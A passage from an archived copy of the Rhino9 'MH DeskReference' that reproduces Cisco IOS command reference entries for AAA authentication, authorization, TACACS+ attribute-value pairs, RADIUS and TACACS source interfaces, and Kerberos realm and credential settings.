[HOME]

A rchive Date
[ 21-04-2001 ]
Category
[ Information Technologies ]
sub-Categoy
[ Microsoft ]

http://www.infosyssec.org/infosyssec/TheMHD.html

The MH DeskReference

Version 1.2

Written/Assembled by

The Rhino9 Team

enable Uses the enable password for authentication.

line Uses the line password for authentication.

none Uses no authentication.

tacacs+ Uses TACACS+ authentication.

radius Uses RADIUS authentication.

Note This command cannot be used with TACACS or extended TACACS.

Example

The following example creates an authentication list that first tries to contact a TACACS+ server. If no server can be found, AAA tries to use the enable password. If this attempt also returns an error (because no enable password is configured on the server), the user is allowed access with no authentication.

aaa authentication enable default tacacs+ enable none

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

aaa authentication local-override

aaa authorization

aaa new-model

enable password †

[12.2.5] aaa authentication local-override

To configure the Cisco IOS software to check the local user database for authentication before attempting another form of authentication, use the aaa authentication local-override global configuration command. Use the no form of this command to disable the override.

aaa authentication local-override

no aaa authentication local-override

Syntax Description

This command has no arguments or keywords.

Default

Override is disabled.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.3.

This command is useful when you want to configure an override to the normal authentication process for certain personnel such as system administrators.

When this override is set, the user is always prompted for the username. The system then checks to see if the entered username corresponds to a local account. If the username does not correspond to one in the local database, login proceeds with the methods configured with other aaa commands (such as aaa authentication login). Note that when using this command Username: is fixed as the first prompt.

Example

The following example enables AAA authentication override:

aaa authentication local-override

Related Commands

aaa authentication arap

aaa authentication enable default

aaa authentication login

aaa authentication ppp

aaa new-model

[12.2.6] aaa authentication login

To set AAA authentication at login, use the aaa authentication login global configuration command. Use the no form of this command to disable AAA authentication.

aaa authentication login {default | list-name} method1 [...[method4]]

no aaa authentication login {default | list-name} method1 [...[method4]]

Syntax Description

default Uses the listed authentication methods that follow this argument as the default list of methods when a user logs in.

list-name Character string used to name the following list of authentication methods activated when a user logs in.

method At least one and up to four of the keywords described in Table 3.

Default

If the default list is not set, only the local user database is checked. This version has the same effect as the following command:

aaa authentication login default local

Note On the console, login will succeed without any authentication checks if default is not set.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.3.

The default and optional list names that you create with the aaa authentication login command are used with the login authentication command.

Create a list by entering the aaa authentication list-name method command for a particular protocol, where list-name is any character string used to name this list (such as MIS-access). The method argument identifies the list of methods that the authentication algorithm tries, in the given sequence. Method keywords are described in Table 3.

To create a default list that is used if no list is assigned to a line, use the login authentication command with the default argument followed by the methods you want to use in default situations.

The additional methods of authentication are used only if the previous method returns an error, not if it fails. To ensure that the authentication succeeds even if all methods return an error, specify none as the final method in the command line.

If authentication is not specifically set for a line, the default is to deny access and no authentication is performed. Use the show running-config command to display currently configured lists of authentication methods.

Table 3 AAA Authentication Login Methods

Keyword Description

enable Uses the enable password for authentication.

krb5 Uses Kerberos 5 for authentication.

line Uses the line password for authentication.

local Uses the local username database for authentication.

none Uses no authentication.

radius Uses RADIUS authentication.

tacacs+ Uses TACACS+ authentication.

krb5-telnet Uses Kerberos 5 Telnet authentication protocol when using Telnet to connect to the router.

Note This command cannot be used with TACACS or extended TACACS.

Examples

The following example creates an AAA authentication list called MIS-access. This authentication first tries to contact a TACACS+ server. If no server is found, TACACS+ returns an error and AAA tries to use the enable password. If this attempt also returns an error (because no enable password is configured on the server), the user is allowed access with no authentication.

aaa authentication login MIS-access tacacs+ enable none

The following example creates the same list, but it sets it as the default list that is used for all login authentications if no other list is specified:

aaa authentication login default tacacs+ enable none

The following example sets authentication at login to use the Kerberos 5 Telnet authentication protocol when using Telnet to connect to the router:

aaa authentication login default KRB5-TELNET krb5

Related Commands

A dagger (†) indicates that this command is documented outside this chapter.

aaa authentication local-override

aaa new-model

[12.2.7] aaa authentication nasi

To specify AAA authentication for Netware Asynchronous Services Interface (NASI) clients connecting through the access server, use the aaa authentication nasi global configuration command. Use the no form of this command to disable authentication for NASI clients.

aaa authentication nasi {default | list-name} method1 [...[method4]]

no aaa authentication nasi{default | list-name} method1 [...[method4]]

Syntax Description

default Makes the listed authentication methods that follow this argument the default list of methods used when a user logs in.

list-name

Character string used to name the following list of authentication methods activated when a user logs in.

methods At least one and up to four of the methods described in Table 4.

Default

If the default list is not set, only the local user database is selected. This setting has the same effect as the following command:

aaa authentication nasi default local

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

The default and optional list names that you create with the aaa authentication nasi command are used with the nasi authentication command.

Create a list by entering the aaa authentication nasi command, where list-name is any character string that names this list (such as MIS-access). The method argument identifies the list of methods the authentication algorithm tries in the given sequence.

To create a default list that is used if no list is assigned to a line with the nasi authentication command, use the default argument followed by the methods that you want to use in default situations.

The remaining methods of authentication are used only if the previous method returns an error, not if it fails. To ensure that the authentication succeeds even if all methods return an error, specify none as the final method in the command line.

If authentication is not specifically set for a line, the default is to deny access and no authentication is performed. Use the show running-config command to displays currently configured lists of authentication methods.

Table 4 AAA Authentication NASI Methods

Keyword Description

enable Uses the enable password for authentication.

line Uses the line password for authentication.

local Uses the local username database for authentication.

none Uses no authentication.

tacacs+ Uses TACACS+ authentication.

Note This command cannot be used with TACACS or extended TACACS.

Examples

The following example creates an AAA authentication list called list1. This authentication first tries to contact a TACACS+ server. If no server is found, TACACS+ returns an error and AAA tries to use the enable password. If this attempt also returns an error (because no enable password is configured on the server), the user is allowed access with no authentication.

aaa authentication nasi list1 tacacs+ enable none

The following example creates the same list, but sets it as the default list that is used for all login authentications if no other list is specified:

aaa authentication nasi default tacacs+ enable none

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

ipx nasi-server enable †

nasi authentication

show ipx nasi connections †

show ipx spx-protocol †

[12.2.8] aaa authentication password-prompt

To change the text displayed when users are prompted for a password, use the aaa authentication password-prompt global configuration command. Use the no form of this command to return to the default password prompt text.

aaa authentication password-prompt {text-string}

no aaa authentication password-prompt {text-string}

Syntax Description

text-string String of text that will be displayed when the user is prompted to enter a password. If this text-string contains spaces or unusual characters, it must be enclosed in double-quotes (for example, "Enter your password:").

Default

This command is disabled by default.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.0.

Use the aaa authentication password-prompt command to change the default text that the Cisco IOS software displays when prompting a user to enter a password. This command changes the password prompt for the enable password as well as for login passwords that are not supplied by remote security servers. The no form of this command returns the password prompt to the default value:

Password:

The aaa authentication password-prompt command does not change any dialog that is supplied by a remote TACACS+ or RADIUS server.

Example

The following example changes the text for the password prompt:

aaa authentication password-prompt "Enter your password now:"

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

aaa authentication username prompt

aaa new-model

enable password †

[12.2.9] aaa authentication ppp

To specify one or more AAA authentication methods for use on serial interfaces running Point-to-Point (PPP) and TACACS+, use the aaa authentication ppp global configuration command. Use the no form of this command to disable authentication.

aaa authentication ppp {default | list-name} method1 [...[method4]]

no aaa authentication ppp {default | list-name} method1 [...[method4]]

Syntax Description

default Uses the listed authentication methods that follow this argument as the default list of methods when a user logs in.

list-name Character string used to name the following list of authentication methods tried when a user logs in.

method

Default

If the default list is not set, only the local user database is checked. This command has the same effect as the following command:

aaa authentication ppp default local

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.3.

The lists that you create with the aaa authentication ppp command are used with the ppp authentication command. These lists contain up to four authentication methods that are used when a user tries to log in to the serial interface.

Create a list by entering the aaa authentication ppp list-name method command, where list-name is any character string used to name this list (such as MIS-access). The method argument identifies the list of methods that the authentication algorithm tries in the given sequence. You can enter up to four methods. Method keywords are described in Table 5.

The additional methods of authentication are only used if the previous method returns an error, not if it fails. Specify none as the final method in the command line to have authentication succeed even if all methods return an error.

If authentication is not specifically set for a function, the default is none and no authentication is performed. Use the show running-config command to display lists of authentication methods.

Table 5 AAA Authentication PPP Methods

Keyword Description

if-needed Does not authenticate if user has already been authenticated on a TTY line.

krb5 Uses Kerberos 5 for authentication (can only be used for PAP authentication).

local Uses the local username database for authentication.

none Uses no authentication.

radius Uses RADIUS authentication.

tacacs+ Uses TACACS+ authentication.

Note This command cannot be used with TACACS or extended TACACS.

Example

The following example creates an AAA authentication list called MIS-access for serial lines that use PPP. This authentication first tries to contact a TACACS+ server. If this action returns an error, the user is allowed access with no authentication.

aaa authentication MIS-access ppp tacacs+ none

Related Commands

A dagger (†) indicates that this command is documented outside this chapter.

aaa authentication local-override

aaa new-model

ppp authentication

[12.3.0] aaa authentication username-prompt

To change the text displayed when users are prompted to enter a username, use the aaa authentication username-prompt global configuration command. Use the no form of this command to return to the default username prompt text.

aaa authentication username-prompt {text-string}

no aaa authentication username-prompt {text-string}

Syntax Description

text-string String of text that will be displayed when the user is prompted to enter a username. If this text-string contains spaces or unusual characters, it must be enclosed in double-quotes (for example, "Enter your name:").

Default

This command is disabled by default.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.0.

Use the aaa authentication username-prompt command to change the default text that the Cisco IOS software displays when prompting a user to enter a username. The no form of this command returns the username prompt to the default value:

Username:

Some protocols (for example, TACACS+) have the ability to override the use of local username prompt information. Using the aaa authentication username-prompt command will not change the username prompt text in these instances.

Note The aaa authentication username-prompt command does not change any dialog that is supplied by a remote TACACS+ server.

Example

The following example changes the text for the username prompt:

aaa authentication username-prompt "Enter your name here:"

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

aaa authentication password-prompt

aaa new-model

enable password †

[12.3.1] aaa authorization

Use the aaa authorization global configuration command to set parameters that restrict a user's network access. Use the no form of this command to disable authorization for a function.

aaa authorization {network | exec | command level} method

no aaa authorization {network | exec | command level}

Syntax Description

network Runs authorization for all network-related service requests, including SLIP, PPP, PPP NCPs, and ARA protocol.

exec Runs authorization to determine if the user is allowed to run an EXEC shell. This facility might return user profile information such as autocommand information.

command Runs authorization for all commands at the specified privilege level.

level Specific command level that should be authorized. Valid entries are 0 through 15.

method One of the keywords in

Table 6

Default

Authorization is disabled for all actions (equivalent to the keyword none).

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

Note There are five commands associated with privilege level 0: disable, enable, exit, help, and logout. If you configure AAA authorization for a privilege level greater than 0, these five commands will not be included in the privilege level command set.

Use the aaa authorization command to create at least one, and up to four, authorization methods that can be used when a user accesses the specified function.

Note This command, along with aaa accounting, replaces the tacacs-server suite of commands in previous versions of TACACS.

The additional methods of authorization are used only if the previous method returns an error, not if it fails. Specify none as the final method in the command line to have authorization succeed even if all methods return an error.

If authorization is not specifically set for a function, the default is none and no authorization is performed.

Table 6 AAA Authorization Methods

Keyword Description

tacacs+ Requests authorization information from the TACACS+ server.

if-authenticated Allows the user to access the requested function if the user is authenticated.

none No authorization is performed.

local Uses the local database for authorization.

radius Uses RADIUS to get authorization information.

krb5-instance Uses the instance defined by the Kerberos instance map command.

The authorization command causes a request packet containing a series of attribute value pairs to be sent to the TACACS daemon as part of the authorization process. The daemon can do one of the following:

Accept the request as is
Make changes to the request
Refuse the request, and hence, refuse authorization

Table 7 describes attribute value (AV) pairs associated with the aaa authorization command. Registered users can find more information about TACACS+ and attribute pairs on Cisco Connection Online (CCO).

Attribute Description Cisco IOS Release

11.0 Cisco IOS Release11.1 Cisco IOS Release11.2

service=x The primary service. Specifying a service attribute indicates that this is a request for authorization or accounting of that service. Current values are slip, ppp, arap, shell, tty-daemon, connection, and system. This attribute must always be included. yes yes yes

protocol=x A protocol that is a subset of a service. An example would be any PPP NCP. Currently known values are lcp, ip, ipx, atalk, vines, lat, xremote, tn3270, telnet, rlogin, pad, vpdn, http, and unknown. yes yes yes

cmd=x A shell (EXEC) command. This indicates the command name for a shell command that is to be run. This attribute must be specified if service equals "shell." A NULL value indicates that the shell itself is being referred to. yes yes yes

cmd-arg=x An argument to a shell (EXEC) command. This indicates an argument for the shell command that is to be run. Multiple cmd-arg attributes may be specified, and they are order dependent. yes yes yes

acl=x ASCII number representing a connection access list. Used only when service=shell. yes yes yes

inacl=x ASCII identifier for an interface input access list. Used with service=ppp and protocol=ip. yes yes yes

inacl#<n> ASCII access list identifier for an input access list to be installed and applied to an interface for the duration of the current connect ion. Used with service=ppp and protocol=ip, and service service=ppp and protocol =ipx. no no 11.2(4)F

outacl=x ASCII identifier for an interface output access list. Used with service=ppp and protocol=ip, and service service=ppp and protocol=ipx. Contains an IP output access list for SLIP or PPP/IP (for example, outacl=4). The access list itself must be preconfigured on the router. Per-user access lists do not currently work with ISDN interfaces. yes (PPP/IP only) yes yes

outacl#<n> ACSII access list identifier for an interface output access list to be installed and applied to an interface for the duration of the current condition. Used with service=ppp and protocol=ip, and service service=ppp and protocol=ipx. no no 11.2(4)F

zonelist=x A numeric zonelist value. Used with service=arap. Specifies an AppleTalk zonelist for ARA (for example, zonelist=5). yes yes yes

addr=x A network address. Used with service=slip, service=ppp, and protocol=ip. Contains the IP address that the remote host should use when connecting via SLIP or PPP/IP. For example, addr=1.2.3.4. yes yes yes

addr-pool=x Specifies the name of a local pool from which to get the address of the remote host. Used with service=ppp and protocol=ip.

Note that addr-pool works in conjunction with local pooling. It specifies the name of a local pool (which must be preconfigured on the network access server). Use the ip-local pool command to declare local pools. For example:

ip address-pool local

ip local pool boo 1.0.0.1 1.0.0.10

ip local pool moo 2.0.0.1 2.0.0.20

You can then use TACACS+ to return addr-pool=boo or addr-pool=moo to indicate the address pool from which you want to get this remote node's address. yes yes yes

routing=x Specifies whether routing information is to be propagated to, and accepted from this interface. Used with service=slip, service=ppp, and protocol=ip. Equivalent in function to the /routing flag in SLIP and PPP commands. Can either be true or false (for example, routing=true). yes yes yes

route Specifies a route to be applied to an interface. Used with service=slip, service=ppp, and protocol=ip.

During network authorization, the route attribute can be used to specify a per-user static route, to be installed by TACACS+ as follows:

route=" dst_address mask [ gateway ]"

This indicates a temporary static route that is to be applied. dst_address, mask, and gateway are expected to be in the usual dotted-decimal notation, with the same meanings as in the familiar ip route configuration command on a network access server.

If gateway is omitted, the peer's address is the gateway. The route is expunged when the connection terminates. no yes yes

route#<n> Like the route AV pair, this specifies a route to be applied to an interface, but these routes are numbered, allowing multiple routes to be applied. Used with service=ppp and protocol=ip, and service=ppp and protocol=ipx. no no 11.2(4)F

timeout=x The number of minutes before an ARA session disconnects (for example, timeout=60). A value of zero indicates no timeout. Used with service=arap. yes yes yes

idletime=x Sets a value, in minutes, after which an idle session is terminated. Does not work for PPP. A value of zero indicates no timeout. no yes yes

autocmd=x Specifies an autocommand to be executed at EXEC startup (for example, autocmd=telnet muruga.com). Used only with service=shell. yes yes yes

noescape=x Prevents user from using an escape character. Used with service=shell. Can be either true or false (for example, noescape=true). yes yes yes

nohangup=x Used with service=shell. Specifies the nohangup option. Can be either true or false (for example, nohangup=false). yes yes yes

priv-lvl=x Privilege level to be assigned for the EXEC. Used with service=shell. Privilege levels range from 0 to 15, with 15 being the highest. yes yes yes

callback-dialstring Sets the telephone number for a callback (for example: callback-dialstring=408-555-1212). Value is NULL, or a dial-string. A NULL value indicates that the service may choose to get the dialstring through other means. Used with service=arap, service=slip, service=ppp, service=shell. Not valid for ISDN. no yes yes

callback-line The number of a TTY line to use for callback (for example: callback-line=4). Used with service=arap, service=slip, service=ppp, service=shell. Not valid for ISDN. no yes yes

callback-rotary The number of a rotary group (between 0 and 100 inclusive) to use for callback (for example: callback-rotary=34). Used with service=arap, service=slip, service=ppp, service=shell. Not valid for ISDN. no yes yes

nocallback-verify Indicates that no callback verification is required. The only valid value for this parameter is 1 (for example, nocallback-verify=1). Used with service=arap, service=slip, service=ppp, service=shell. There is no authentication on callback. Not valid for ISDN. no yes yes

tunnel-id Specifies the username that will be used to authenticate the tunnel over which the individual user MID will be projected. This is analogous to the remote name in the vpdn outgoing command. Used with service=ppp and protocol=vpdn. no no yes

ip-addresses Space-separated list of possible IP addresses that can be used for the end-point of a tunnel. Used with service=ppp and protocol=vpdn. no no yes

nas-password Specifies the password for the network access server during the L2F tunnel authentication. Used with service=ppp and protocol=vpdn. no no yes

gw-password Specifies the password for the home gateway during the L2F tunnel authentication. Used with service=ppp and protocol=vpdn. no no yes

rte-ftr-in#<n> Specifies an input access list definition to be installed and applied to routing updates on the current interface for the duration of the current connection. Used with service=ppp and protocol=ip, and with service=ppp and protocol=ipx. no no 11.2(4)F

rte-ftr-out#<n> Specifies an output access list definition to be installed and applied to routing updates on the current interface for the duration of the current connection. Used with service=ppp and protocol=ip, and with service=ppp and protocol=ipx. no no yes 11.2(4)F

sap#<n> Specifies static Service Advertising Protocol (SAP) entries to be installed for the duration of a connection. Used with service=ppp and protocol=ipx. no no yes 11.2(4)F

sap-fltr-in#<n> Specifies an input SAP filter access list definition to be installed and applied on the current interface for the duration of the current connection. Used with service=ppp and protocol=ipx. no no yes 11.2(4)F

sap-fltr-out#<n> Specifies an output SAP filter access list definition to be installed and applied on the current interface for the duration of the current connection. Used with service=ppp and protocol=ipx. no no 11.2(4)F

pool-def#<n> Used to define IP address pools on the network access server. Used with service=ppp and protocol=ip. no no 11.2(4)F

source-ip=x Used as the source IP address of all VPDN packets generated as part of a VPDN tunnel. This is equivalent to the Cisco vpdn outgoing global configuration command. no no yes

Examples

The following example specifies that TACACS+ authorization is used for all network-related requests. If this authorization method returns an error (if the TACACS+ server cannot be contacted), no authorization is performed and the request succeeds.

aaa authorization network tacacs+ none

The following example specifies that TACACS+ authorization is run for level 15 commands. If this authorization method returns an error (that is, if the TACACS+ server cannot be contacted), no authorization is performed and the request succeeds.

aaa authorization command 15 tacacs+ none

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

aaa accounting †

aaa new-model

[12.3.2] aaa authorization config-commands

To disable AAA configuration command authorization in the EXEC mode, use the no form of the aaa authorization config-commands global configuration command. Use the standard form of this command to reestablish the default created when the aaa authorization command level method command was issued.

aaa authorization config-commands

no aaa authorization config-commands

Syntax Description

This command has no arguments or keywords.

Default

After the aaa authorization command level method has been issued, this command is enabled by default---meaning that all configuration commands in the EXEC mode will be authorized.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.2.

If aaa authorization command level method is enabled, all commands, including configuration commands, are authorized by AAA using the method specified. Because there are configuration commands that are identical to some EXEC-level commands, there can be some confusion in the authorization process. Using no aaa authorization config-commands stops the network access server not from attempting configuration command authorization.

Once the no form of this command has been issued, AAA authorization of configuration commands is completely disabled. Care should be taken before issuing the no form of this command because it potentially reduces the amount of administrative control on configuration commands.

Use the aaa authorization config-commands command if, after using the no form of this command, you need to reestablish the default set by the aaa authorization command level method command.

Example

The following example specifies that TACACS+ authorization is run for level 15 commands and that AAA authorization of configuration commands is disabled:

aaa new-model

aaa authorization command 15 tacacs+ none

no aaa authorization config-commands

Related Commands

aaa authorization

[12.3.3] aaa new-model

To enable the AAA access control model, issue the aaa new-model global configuration command. Use the no form of this command to disable this functionality.

aaa new-model

no aaa new-model

Syntax Description

This command has no arguments or keywords.

Default

AAA is not enabled.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

This command enables the AAA access control system and TACACS+. If you initialize AAA functionality and later decide to use TACACS or extended TACACS, issue the no version of this command before you enable the version of TACACS that you want to use.

After enabling AAA/TACACS+ with the aaa new-model command, you must use the tacacs-server key command to set the authentication key used in all TACACS+ communications with the TACACS+ daemon.

Example

The following example initializes AAA and TACACS+:

aaa new-model

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

aaa accounting †

aaa authentication arap

aaa authentication enable default

aaa authentication local-override

aaa authentication login

aaa authentication ppp

aaa authorization

tacacs-server key

[12.3.4] arap authentication

To enable AAA authentication for ARA on a line, use the arap authentication line configuration command. Use the no form of the command to disable authentication for an ARA line.

arap authentication {default | list-name}

no arap authentication {default | list-name}

Caution If you use a list-name value that was not configured with the aaa authentication arap command, ARA protocol will be disabled on this line.

Syntax Description

default Default list created with the aaa authentication arap command.

list-name Indicated list created with the aaa authentication arap command.

Default

ARA protocol authentication uses the default set with aaa authentication arap command. If no default is set, the local user database is checked.

Command Mode

Line configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.0.

This command is a per-line command that specifies the name of a list of AAA authentication methods to try at login. If no list is specified, the default list is used (whether or not it is specified in the command line). You create defaults and lists with the aaa authentication arap command. Entering the no version of arap authentication has the same effect as entering the command with the default argument.

Before issuing this command, create a list of authentication processes by using the aaa authentication arap global configuration command.

Example

The following example specifies that the TACACS+ authentication list called MIS-access is used on ARA line 7:

line 7

arap authentication MIS-access

Related Command

aaa authentication arap

[12.3.5] clear kerberos creds

Use the clear kerberos creds EXEC command to delete the contents of your credentials cache.

clear kerberos creds

Syntax Description

This command has no keywords or arguments.

Command Mode

EXEC

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

Credentials are cleared when the user logs out.

Cisco supports Kerberos 5.

Example

The following example illustrates the clear kerberos creds command:

cisco-2500> show kerberos creds

Default Principal: chet@cisco.com

Valid Starting Expires Service Principal

18-Dec-1995 16:21:07 19-Dec-1995 00:22:24 krbtgt/CISCO.COM@CISCO.COM

cisco-2500> clear kerberos creds

cisco-2500> show kerberos creds

No Kerberos credentials.

cisco-2500>

Related Command

show kerberos creds

[12.3.6] enable last-resort

To specify what happens if the TACACS and extended TACACS servers used by the enable command do not respond, use the enable last-resort global configuration command. Use the no form of this command to restore the default.

enable last-resort {password | succeed}

no enable last-resort {password | succeed}

Syntax Description

password Allows you to enter enable mode by entering the privileged command level password. A password must contain from 1 to 25 uppercase and lowercase alphanumeric characters.

succeed Allows you to enter enable mode without further question.

Default

Access to enable mode is denied.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

The secondary authentication is used only if the first attempt fails.

Note This command is not used in AAA/TACACS+, which uses the aaa authentication suite of commands instead.

Example

In the following example, if the TACACS servers do not respond to the enable command, the user can enable by entering the privileged level password:

enable last-resort password

Related Command

A dagger (†) indicates that the command is documented outside this chapter.

enable †

[12.3.7] enable use-tacacs

To enable use of the TACACS to determine whether a user can access the privileged command level, use the enable use-tacacs global configuration command. Use the no form of this command to disable TACACS verification.

enable use-tacacs

no enable use-tacacs

Caution If you use the enable use-tacacs command, you must also use the tacacs-server authenticate enable command, or you will be locked out of the privileged command level.

Syntax Description

This command has no arguments or keywords.

Default

Disabled

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

When you add this command to the configuration file, the EXEC enable command prompts for a new username and password pair. This pair is then passed to the TACACS server for authentication. If you are using extended TACACS, it also passes any existing UNIX user identification code to the server.

Note This command initializes TACACS. Use the tacacs server-extended command to initialize extended TACACS, or use the aaa new-model command to initialize AAA/TACACS+.

Example

The following example sets TACACS verification on the privileged EXEC-level login sequence:

enable use-tacacs

tacacs-server authenticate enable

Related Command

A dagger (†) indicates that the command is documented outside this chapter.

tacacs-server authenticate enable †

[12.3.8] ip radius source-interface

Use the ip radius source-interface global configuration command to force RADIUS to use the IP address of a specified interface for all outgoing RADIUS packets. Use the no form of this command to disable use of a specified interface IP address.

ip radius source-interface subinterface-name

no ip radius source-interface

Syntax Description

subinterface-name Name of the interface that RADIUS uses for all of its outgoing packets.

Default

This command has no factory-assigned default.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

Use this command to set a subinterface's IP address to be used as the source address for all outgoing RADIUS packets. This address is used as long as the interface is in the up state. In this way, the RADIUS server can use one IP address entry for every network access client instead of maintaining a list of IP addresses.

This command is especially useful in cases where the router has many interfaces, and you want to ensure that all RADIUS packets from a particular router have the same IP address.

The specified interface must have an IP address associated with it. If the specified subinterface does not have an IP address or is in a down state, then RADIUS reverts to the default. To avoid this, add an IP address to the subinterface or bring the interface to the up state.

Example

The following example makes RADIUS use the IP address of subinterface s2 for all outgoing RADIUS packets:

ip radius source-interface s2

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

ip tacacs source-interface †

ip telnet source-interface †

ip tftp source-interface †

[12.3.9] ip tacacs source-interface

Use the ip tacacs source-interface global configuration command to force TACACS to use the IP address of a specified interface for all outgoing TACACS packets. Use the no form of this command to disable use of a specified interface IP address.

ip tacacs source-interface subinterface-name

no ip tacacs source-interface

Syntax Description

subinterface-name Name of the interface that TACACS uses for all of its outgoing packets.

Default

This command has no factory-assigned default.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

Use this command to set a subinterface's IP address for all outgoing TACACS packets. This address is used as long as the interface is in the up state. In this way, the TACACS server can use one IP address entry associated with the network access client instead of maintaining a list of all IP addresses.

This command is especially useful in cases where the router has many interfaces, and you want to ensure that all TACACS packets from a particular router have the same IP address.

The specified interface must have an IP address associated with it. If the specified subinterface does not have an IP address or is in a down state, TACACS reverts to the default. To avoid this, add an IP address to the subinterface or bring the interface to the up state.

Example

The following example makes TACACS use the IP address of subinterface s2 for all outgoing TACACS (TACACS, extended TACACS, or TACACS+) packets:

ip tacacs source-interface s2

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

ip radius source-interface †

ip telnet source-interface †

ip tftp source-interface †

[12.4.0] kerberos clients mandatory

Use the kerberos clients mandatory global configuration command to cause the rsh, rcp, rlogin, and telnet commands to fail if they cannot negotiate the Kerberos protocol with the remote server. Use the no form of this command to disable this option.

kerberos clients mandatory

no kerberos clients mandatory

Syntax Desctiption

This command has no arguments or keywords.

Default

Disabled

Command Mode

Global configuration

User Guidelines

This command first appeared in Cisco IOS Release 11.2.

If this command is not configured and the user has Kerberos credentials stored locally, the rsh, rcp, rlogin, and telnet commands attempt to negotiate the Kerberos protocol with the remote server and will use the un-Kerberized protocols if unsuccessful.

If this command is not configured and the user has no Kerberos credentials, the standard protocols for rcp and rsh are used to negotiate the Keberos protocol.

Example

The following example illustrates the kerberos clients mandatory command:

kerberos clients mandatory

Related Commands

A dagger (†) indicates that this command is documented outside this chapter.

copy rcp †

kerberos credentials forward

rlogin †

rsh †

telnet †

[12.4.1] kerberos credentials forward

Use the kerberos credentials forward global configuration command to force all network application clients on the router to forward users' Kerberos credentials upon successful Kerberos authentication. Use the no form of this command to turn off Kerberos credentials forwarding.

kerberos credentials forward

no kerberos credentials forward

Syntax Description

This command has no arguments or keywords.

Default

Disabled

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.2.

Enable credentials forwarding to have users' TGTs forwarded to the host they authenticate to. In this way, users can connect to multiple hosts in the Kerberos realm without running the KINIT program each time they need to get a TGT.

Example

The following example illustrates the kerberos credentials forward command:

kerberos credentials forward

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

copy rcp †

rlogin †

rsh †

telnet †

[12.4.2] kerberos instance map

Use the kerberos instance map global configuration command to map Kerberos instances to Cisco IOS privilege levels. Use the no form of this command to remove a Kerberos instance map.

kerberos instance map instance privilege-level

no kerberos instance map instance

Syntax Description

instance Name of a Kerberos instance.

privilege-level The privilege level at which a user is set if the user's Kerberos principle contains the matching Kerberos instance. You can specify up to 16 privilege levels, using numbers 0 through 15. Level 1 is normal EXEC-mode user privileges.

Default

Privilege level 1

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.2.

Use this command to create user instances with access to administrative commands.

Example

In the following example, the privilege level is set to 15 for authenticated Kerberos users with the admin instance in Kerberos realm cisco.com:

kerberos instance map admin 15

Related Command

aaa authorization

[12.4.3] kerberos local-realm

Use the kerberos local-realm global configuration command to specify the Kerberos realm in which the router is located. Use the no form of this command to remove the specified Kerberos realm from this router.

kerberos local-realm kerberos-realm

no kerberos local-realm

Syntax Description

kerberos-realm The name of the default Kerberos realm. A Kerberos realm consists of users, hosts, and network services that are registered to a Kerberos server. The Kerberos realm must be in uppercase letters.

Default

Disabled

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

The router can be located in more than one realm at a time. However, there can only be one instance of Kerberos local-realm. The realm specified with this command is the default realm.

Example

The following example illustrates the kerberos local realm command:

kerberos local-realm MURUGA.COM

Related Commands

kerberos preauth

kerberos realm

kerberos server

kerberos srvtab entry

kerberos srvtab remote

[12.4.4] kerberos preauth

Use the kerberos preauth global configuration command to specify a preauthentication method to use to communicate with the KDC. Use the no form of this command to disable Kerberos preauthentication.

kerberos preauth [encrypted-unix-timestamp | none]

no kerberos preauth

Syntax Description

encrypted-unix-timestamp Use an encrypted UNIX timestamp as a quick authentication method when communicating with the KDC.

none Do not use Kerberos preauthentication.

Default

Disabled

Command Mode

Global Configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.2.

It is more secure to use a preauthentication for communications with the KDC. However, communication with the KDC will fail if the KDC does not support this particular version of kerberos preauth. If that happens, turn off the preauthentication with the none option.

The no form of this command is equivalent to using then none keyword.

Example

The following example illustrates how to enable and disable Kerberos preauthentication:

kerberos preauth encrypted-unix-timestamp

kerberos preauth none

Related Commands

kerberos local-realm

kerberos server

kerberos srvtab entry

kerberos srvtab remote

[12.4.5] kerberos realm

Use the kerberos realm global configuration command to map a host name or Domain Naming System (DNS) domain to a Kerberos realm. Use the no form of this command to remove a Kerberos realm map.

kerberos realm {dns-domain | host} kerberos-realm

no kerberos realm {dns-domain | host} kerberos-realm

Syntax Description

dns-domain Name of a DNS domain or host.

host Name of a DNS host.

kerberos-realm Name of the Kerberos realm the specified domain or host belongs to.

Default

Disabled

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

DNS domains are specified with a leading dot (.) character; hostnames cannot begin with a dot (.) character. There can be multiple entries of this line.

A Kerberos realm consists of users, hosts, and network services that are registered to a Kerberos server. The Kerberos realm must be in uppercase letters. The router can be located in more than one realm at a time. Kerberos realm names must be in all uppercase characters.

Example

The following example illustrates the kerberos realm command:

kerberos realm .muruga.com MURUGA.COM

kerberos realm muruga.com MURUGA.COM

Related Commands

kerberos local-realm

kerberos server

kerberos srvtab entry

kerberos srvtab remote

